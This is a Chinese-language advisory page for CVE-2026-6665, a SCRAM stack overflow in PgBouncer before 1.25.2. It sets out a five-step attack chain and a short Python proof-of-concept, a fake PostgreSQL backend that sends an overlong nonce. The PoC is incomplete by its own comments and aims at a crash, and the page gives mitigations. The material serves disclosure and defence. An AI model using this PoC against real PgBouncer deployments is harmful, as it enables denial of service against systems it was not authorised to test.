CVE-2026-6665: PgBouncer SCRAM栈溢出漏洞

漏洞信息

漏洞编号

CVE-2026-6665

漏洞类型

栈溢出

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PgBouncer

漏洞概述

PgBouncer 1.25.2 之前的版本存在严重的安全漏洞。该漏洞位于 SCRAM 认证代码中，问题源于在构建 SCRAM client-final-message 内容时，未能正确检查 strlcat() 函数的返回值。一个恶意的后端数据库服务器可以通过发送包含超长 nonce 的 SCRAM server-final-message，成功触发栈溢出，导致系统崩溃或潜在的被控制。

技术细节

该漏洞属于典型的内存破坏类漏洞，具体表现为栈缓冲区溢出。PgBouncer 在处理 SCRAM（Salted Challenge Response Authentication Mechanism）认证协议时，需要构建 client-final-message。在此过程中，代码使用了 strlcat() 函数进行字符串拼接操作，但关键问题在于程序未能正确校验 strlcat() 函数的返回值，从而无法有效检测缓冲区边界。攻击者若能控制恶意的后端数据库服务器（或通过中间人攻击模拟后端），可发送一个精心构造的 SCRAM server-final-message，其中包含一个超长且恶意的 nonce 字段。当 PgBouncer 接收并处理此消息时，由于缺乏必要的边界检查，数据将溢出预分配的栈缓冲区。鉴于 CVSS 3.1 评分为 8.1，攻击者无需用户交互且无需认证（相对于 PgBouncer 本身），通过网络即可远程利用此漏洞，不仅可能导致服务崩溃（DoS），还可能覆盖返回地址从而实现远程代码执行（RCE）。

攻击链分析

STEP 1

步骤1

攻击者搭建恶意的PostgreSQL后端服务器，或者攻陷现有的后端服务器。

STEP 2

步骤2

配置PgBouncer连接到该恶意后端，触发SCRAM认证流程。

STEP 3

步骤3

恶意后端在SCRAM认证的最后阶段，向PgBouncer发送特制的server-final-message，其中包含超长的nonce字段。

STEP 4

步骤4

PgBouncer在处理该消息时，调用strlcat()函数拼接字符串，但未检查返回值，导致数据写入超出栈缓冲区边界。

STEP 5

步骤5

触发栈溢出，导致PgBouncer进程崩溃（DoS）或执行任意代码（RCE）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Proof of Concept for CVE-2026-6665
# This script simulates a malicious PostgreSQL backend that sends a crafted SCRAM server-final-message.
# It targets a PgBouncer instance connecting to it.

HOST = '0.0.0.0'
PORT = 5433

def exploit():
    # Create a malicious SCRAM server-final-message with a long nonce
    # The message format typically includes 'r=nonce,s=salt,i=iter'
    # We extend the nonce to trigger the strlcat overflow in PgBouncer
    overflow_payload = "A" * 10000
    malicious_message = f"r={overflow_payload},s=deadbeef,i=4096"

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((HOST, PORT))
        s.listen(1)
        print(f"[+] Malicious backend listening on {PORT}...")
        
        conn, addr = s.accept()
        print(f"[+] Connection accepted from {addr}")
        
        # Note: A full PostgreSQL handshake implementation is required to reach the SCRAM stage.
        # This is a simplified payload transmission example.
        # In a real exploit, one must complete the StartupMessage and Authentication flow first.
        
        try:
            # Sending the malicious payload during the SCRAM exchange
            conn.sendall(malicious_message.encode('utf-8'))
            print("[+] Payload sent. Check PgBouncer for crash.")
        except Exception as e:
            print(f"[-] Error: {e}")
        finally:
            conn.close()

if __name__ == "__main__":
    exploit()

影响范围

PgBouncer < 1.25.2

防御指南

临时缓解措施

在无法立即升级的情况下，建议在PgBouncer配置中禁用SCRAM认证机制，改用其他认证方式，并严格限制后端数据库服务器的网络访问，防止连接到不可信的恶意后端。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6665
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6665
3 Details https://www.cvedetails.com/cve/CVE-2026-6665/
4 VulDB https://vuldb.com/cve/CVE-2026-6665
5 Link https://www.pgbouncer.org/changelog.html#pgbouncer-125x